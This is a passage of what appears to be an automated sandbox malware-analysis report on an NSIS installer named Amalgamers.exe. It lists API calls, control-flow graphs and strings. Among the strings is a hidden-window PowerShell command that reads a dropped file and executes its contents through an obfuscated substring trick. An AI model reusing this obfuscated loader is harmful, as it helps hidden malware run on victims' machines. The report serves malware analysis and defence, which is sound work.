                                        • GetDlgItem.USER32(?,00000403), ref: 00405264
                                        • GetDlgItem.USER32(?,000003EE), ref: 00405273
                                        • GetClientRect.USER32(?,?), ref: 004052B0
                                        • GetSystemMetrics.USER32(00000002), ref: 004052B7
                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
                                        • ShowWindow.USER32(?,00000008), ref: 00405353
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405374
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                                        • GetDlgItem.USER32(?,000003F8), ref: 00405282
                                          • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                        • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                                        • CloseHandle.KERNELBASE(00000000), ref: 004053DA
                                        • ShowWindow.USER32(00000000), ref: 004053FD
                                        • ShowWindow.USER32(?,00000008), ref: 00405404
                                        • ShowWindow.USER32(00000008), ref: 0040544A
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                                        • CreatePopupMenu.USER32 ref: 0040548F
                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
                                        • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                                        • OpenClipboard.USER32(00000000), ref: 00405529
                                        • EmptyClipboard.USER32 ref: 0040552F
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                                        • GlobalLock.KERNEL32(00000000), ref: 00405542
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040557A
                                        • CloseClipboard.USER32 ref: 00405580
                                        Strings
                                        • Topfartens Setup: Installing, xrefs: 004054F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: Topfartens Setup: Installing
                                        • API String ID: 590372296-328806273
                                        • Opcode ID: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                                        • Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
                                        • Opcode Fuzzy Hash: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                                        • Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68
                                        APIs
                                        • FindFirstFileA.KERNELBASE(74DF3410,0042C0C0,0042BC78,00405A69,0042BC78,0042BC78,00000000,0042BC78,0042BC78,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 004062AE
                                        • FindClose.KERNEL32(00000000), ref: 004062BA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                        • Instruction ID: 1e2c953ed1559e2f686ededff4fae2b078191910b4ed7f61f032671a7c701700
                                        • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                        • Instruction Fuzzy Hash: ACD01236519020ABC21027787E0C84B7A589F053347118A7BF4A6F21E0C7348C6686DC

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 185 403b6b-403b7d 186 403b83-403b89 185->186 187 403cbe-403ccd 185->187 186->187 188 403b8f-403b98 186->188 189 403d1c-403d31 187->189 190 403ccf-403d17 GetDlgItem * 2 call 40403f SetClassLongA call 40140b 187->190 191 403b9a-403ba7 SetWindowPos 188->191 192 403bad-403bb0 188->192 194 403d71-403d76 call 40408b 189->194 195 403d33-403d36 189->195 190->189 191->192 197 403bb2-403bc4 ShowWindow 192->197 198 403bca-403bd0 192->198 204 403d7b-403d96 194->204 200 403d38-403d43 call 401389 195->200 201 403d69-403d6b 195->201 197->198 205 403bd2-403be7 DestroyWindow 198->205 206 403bec-403bef 198->206 200->201 216 403d45-403d64 SendMessageA 200->216 201->194 203 40400c 201->203 211 40400e-404015 203->211 209 403d98-403d9a call 40140b 204->209 210 403d9f-403da5 204->210 212 403fe9-403fef 205->212 214 403bf1-403bfd SetWindowLongA 206->214 215 403c02-403c08 206->215 209->210 219 403fca-403fe3 DestroyWindow EndDialog 210->219 220 403dab-403db6 210->220 212->203 218 403ff1-403ff7 212->218 214->211 221 403cab-403cb9 call 4040a6 215->221 222 403c0e-403c1f GetDlgItem 215->222 216->211 218->203 226 403ff9-404002 ShowWindow 218->226 219->212 220->219 227 403dbc-403e09 call 405fc2 call 40403f * 3 GetDlgItem 220->227 221->211 223 403c21-403c38 SendMessageA IsWindowEnabled 222->223 224 403c3e-403c41 222->224 223->203 223->224 228 403c43-403c44 224->228 229 403c46-403c49 224->229 226->203 255 403e13-403e4f ShowWindow KiUserCallbackDispatcher call 404061 EnableWindow 227->255 256 403e0b-403e10 227->256 232 403c74-403c79 call 404018 228->232 233 403c57-403c5c 229->233 234 403c4b-403c51 229->234 232->221 236 403c92-403ca5 SendMessageA 233->236 238 403c5e-403c64 233->238 234->236 237 403c53-403c55 234->237 236->221 237->232 241 403c66-403c6c call 40140b 238->241 242 403c7b-403c84 call 40140b 238->242 253 403c72 241->253 242->221 251 403c86-403c90 242->251 251->253 253->232 259 403e51-403e52 255->259 260 403e54 255->260 256->255 261 403e56-403e84 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403e86-403e97 SendMessageA 261->262 263 403e99 261->263 264 403e9f-403ed9 call 404074 call 403b4c call 405fa0 lstrlenA call 405fc2 SetWindowTextA call 401389 262->264 263->264 264->204 275 403edf-403ee1 264->275 275->204 276 403ee7-403eeb 275->276 277 403f0a-403f1e DestroyWindow 276->277 278 403eed-403ef3 276->278 277->212 280 403f24-403f51 CreateDialogParamA 277->280 278->203 279 403ef9-403eff 278->279 279->204 281 403f05 279->281 280->212 282 403f57-403fae call 40403f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->203 282->203 287 403fb0-403fc3 ShowWindow call 40408b 282->287 289 403fc8 287->289 289->212
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                                        • ShowWindow.USER32(?), ref: 00403BC4
                                        • DestroyWindow.USER32 ref: 00403BD8
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                                        • GetDlgItem.USER32(?,?), ref: 00403C15
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                                        • IsWindowEnabled.USER32(00000000), ref: 00403C30
                                        • GetDlgItem.USER32(?,00000001), ref: 00403CDE
                                        • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
                                        • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                                        • ShowWindow.USER32(00000000,?), ref: 00403E1A
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
                                        • EnableWindow.USER32(?,?), ref: 00403E47
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
                                        • EnableMenuItem.USER32(00000000), ref: 00403E64
                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                                        • lstrlenA.KERNEL32(Topfartens Setup: Installing,?,Topfartens Setup: Installing,00000000), ref: 00403EB9
                                        • SetWindowTextA.USER32(?,Topfartens Setup: Installing), ref: 00403EC8
                                        • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID: Topfartens Setup: Installing
                                        • API String ID: 3282139019-328806273
                                        • Opcode ID: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                                        • Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
                                        • Opcode Fuzzy Hash: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                                        • Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 290 4037ce-4037e6 call 406338 293 4037e8-4037f8 call 405efe 290->293 294 4037fa-40382b call 405e87 290->294 303 40384e-403877 call 403a93 call 405a26 293->303 299 403843-403849 lstrcatA 294->299 300 40382d-40383e call 405e87 294->300 299->303 300->299 308 40387d-403882 303->308 309 4038fe-403906 call 405a26 303->309 308->309 310 403884-4038a8 call 405e87 308->310 315 403914-403939 LoadImageA 309->315 316 403908-40390f call 405fc2 309->316 310->309 317 4038aa-4038ac 310->317 319 4039ba-4039c2 call 40140b 315->319 320 40393b-40396b RegisterClassA 315->320 316->315 321 4038bd-4038c9 lstrlenA 317->321 322 4038ae-4038bb call 405963 317->322 334 4039c4-4039c7 319->334 335 4039cc-4039d7 call 403a93 319->335 323 403971-4039b5 SystemParametersInfoA CreateWindowExA 320->323 324 403a89 320->324 328 4038f1-4038f9 call 405938 call 405fa0 321->328 329 4038cb-4038d9 lstrcmpiA 321->329 322->321 323->319 327 403a8b-403a92 324->327 328->309 329->328 333 4038db-4038e5 GetFileAttributesA 329->333 338 4038e7-4038e9 333->338 339 4038eb-4038ec call 40597f 333->339 334->327 343 403a60-403a61 call 405199 335->343 344 4039dd-4039f7 ShowWindow call 4062ca 335->344 338->328 338->339 339->328 347 403a66-403a68 343->347 351 403a03-403a15 GetClassInfoA 344->351 352 4039f9-4039fe call 4062ca 344->352 349 403a82-403a84 call 40140b 347->349 350 403a6a-403a70 347->350 349->324 350->334 353 403a76-403a7d call 40140b 350->353 356 403a17-403a27 GetClassInfoA RegisterClassA 351->356 357 403a2d-403a50 DialogBoxParamA call 40140b 351->357 352->351 353->334 356->357 361 403a55-403a5e call 40371e 357->361 361->327
                                        APIs
                                          • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                          • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                        • lstrcatA.KERNEL32(1033,Topfartens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Topfartens Setup: Installing,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Amalgamers.exe",00000000), ref: 00403849
                                        • lstrlenA.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\Reglements216,1033,Topfartens Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Topfartens Setup: Installing,00000000,00000002,74DF3410), ref: 004038BE
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                        • GetFileAttributesA.KERNEL32(Execute: ), ref: 004038DC
                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Reglements216), ref: 00403925
                                          • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                                        • RegisterClassA.USER32(0042EBA0), ref: 00403962
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
                                        • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
                                        • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
                                        • RegisterClassA.USER32(0042EBA0), ref: 00403A27
                                        • DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\Amalgamers.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Reglements216$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Execute: $RichEd20$RichEd32$RichEdit$RichEdit20A$Topfartens Setup: Installing$_Nb
                                        • API String ID: 1975747703-1190116024
                                        • Opcode ID: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
                                        • Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
                                        • Opcode Fuzzy Hash: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
                                        • Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 364 402d63-402db1 GetTickCount GetModuleFileNameA call 405b39 367 402db3-402db8 364->367 368 402dbd-402deb call 405fa0 call 40597f call 405fa0 GetFileSize 364->368 369 402f95-402f99 367->369 376 402df1 368->376 377 402ed8-402ee6 call 402cff 368->377 379 402df6-402e0d 376->379 383 402ee8-402eeb 377->383 384 402f3b-402f40 377->384 381 402e11-402e1a call 4031ae 379->381 382 402e0f 379->382 390 402e20-402e27 381->390 391 402f42-402f4a call 402cff 381->391 382->381 386 402eed-402f05 call 4031c4 call 4031ae 383->386 387 402f0f-402f39 GlobalAlloc call 4031c4 call 402f9c 383->387 384->369 386->384 414 402f07-402f0d 386->414 387->384 412 402f4c-402f5d 387->412 396 402ea3-402ea7 390->396 397 402e29-402e3d call 405af4 390->397 391->384 401 402eb1-402eb7 396->401 402 402ea9-402eb0 call 402cff 396->402 397->401 411 402e3f-402e46 397->411 408 402ec6-402ed0 401->408 409 402eb9-402ec3 call 4063ef 401->409 402->401 408->379 413 402ed6 408->413 409->408 411->401 417 402e48-402e4f 411->417 418 402f65-402f6a 412->418 419 402f5f 412->419 413->377 414->384 414->387 417->401 420 402e51-402e58 417->420 421 402f6b-402f71 418->421 419->418 420->401 422 402e5a-402e61 420->422 421->421 423 402f73-402f8e SetFilePointer call 405af4 421->423 422->401 424 402e63-402e83 422->424 427 402f93 423->427 424->384 426 402e89-402e8d 424->426 428 402e95-402e9d 426->428 429 402e8f-402e93 426->429 427->369 428->401 430 402e9f-402ea1 428->430 429->413 429->428 430->401
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402D74
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Amalgamers.exe,00000400), ref: 00402D90
                                          • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405B3D
                                          • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Amalgamers.exe,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00402DDC
                                        Strings
                                        • C:\Users\user\Desktop\Amalgamers.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
                                        • Null, xrefs: 00402E5A
                                        • soft, xrefs: 00402E51
                                        • "C:\Users\user\Desktop\Amalgamers.exe", xrefs: 00402D63
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                                        • C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
                                        • Error launching installer, xrefs: 00402DB3
                                        • Inst, xrefs: 00402E48
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\Amalgamers.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Amalgamers.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 4283519449-4234843517
                                        • Opcode ID: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
                                        • Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
                                        • Opcode Fuzzy Hash: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
                                        • Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 431 405fc2-405fcd 432 405fe0-405ff6 431->432 433 405fcf-405fde 431->433 434 4061e7-4061eb 432->434 435 405ffc-406007 432->435 433->432 436 4061f1-4061fb 434->436 437 406019-406023 434->437 435->434 438 40600d-406014 435->438 439 406206-406207 436->439 440 4061fd-406201 call 405fa0 436->440 437->436 441 406029-406030 437->441 438->434 440->439 443 406036-40606a 441->443 444 4061da 441->444 445 406070-40607a 443->445 446 406187-40618a 443->446 447 4061e4-4061e6 444->447 448 4061dc-4061e2 444->448 449 406094 445->449 450 40607c-406080 445->450 451 4061ba-4061bd 446->451 452 40618c-40618f 446->452 447->434 448->434 456 40609b-4060a2 449->456 450->449 453 406082-406086 450->453 457 4061cb-4061d8 lstrlenA 451->457 458 4061bf-4061c6 call 405fc2 451->458 454 406191-40619d call 405efe 452->454 455 40619f-4061ab call 405fa0 452->455 453->449 459 406088-40608c 453->459 469 4061b0-4061b6 454->469 455->469 461 4060a4-4060a6 456->461 462 4060a7-4060a9 456->462 457->434 458->457 459->449 465 40608e-406092 459->465 461->462 467 4060e2-4060e5 462->467 468 4060ab-4060ce call 405e87 462->468 465->456 470 4060f5-4060f8 467->470 471 4060e7-4060f3 GetSystemDirectoryA 467->471 481 4060d4-4060dd call 405fc2 468->481 482 40616e-406172 468->482 469->457 473 4061b8 469->473 475 406165-406167 470->475 476 4060fa-406108 GetWindowsDirectoryA 470->476 474 406169-40616c 471->474 478 40617f-406185 call 40620a 473->478 474->478 474->482 475->474 480 40610a-406114 475->480 476->475 478->457 484 406116-406119 480->484 485 40612e-406144 SHGetSpecialFolderLocation 480->485 481->474 482->478 487 406174-40617a lstrcatA 482->487 484->485 488 40611b-406122 484->488 489 406162 485->489 490 406146-406160 SHGetPathFromIDListA CoTaskMemFree 485->490 487->478 492 40612a-40612c 488->492 489->475 490->474 490->489 492->474 492->485
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(Execute: ,00000400), ref: 004060ED
                                        • GetWindowsDirectoryA.KERNEL32(Execute: ,00000400,?,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004050FF,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000), ref: 00406100
                                        • SHGetSpecialFolderLocation.SHELL32(004050FF,74DF23A0,?,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004050FF,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000), ref: 0040613C
                                        • SHGetPathFromIDListA.SHELL32(74DF23A0,Execute: ), ref: 0040614A
                                        • CoTaskMemFree.OLE32(74DF23A0), ref: 00406156
                                        • lstrcatA.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                                        • lstrlenA.KERNEL32(Execute: ,?,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004050FF,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,00000000,004195D8,74DF23A0), ref: 004061CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
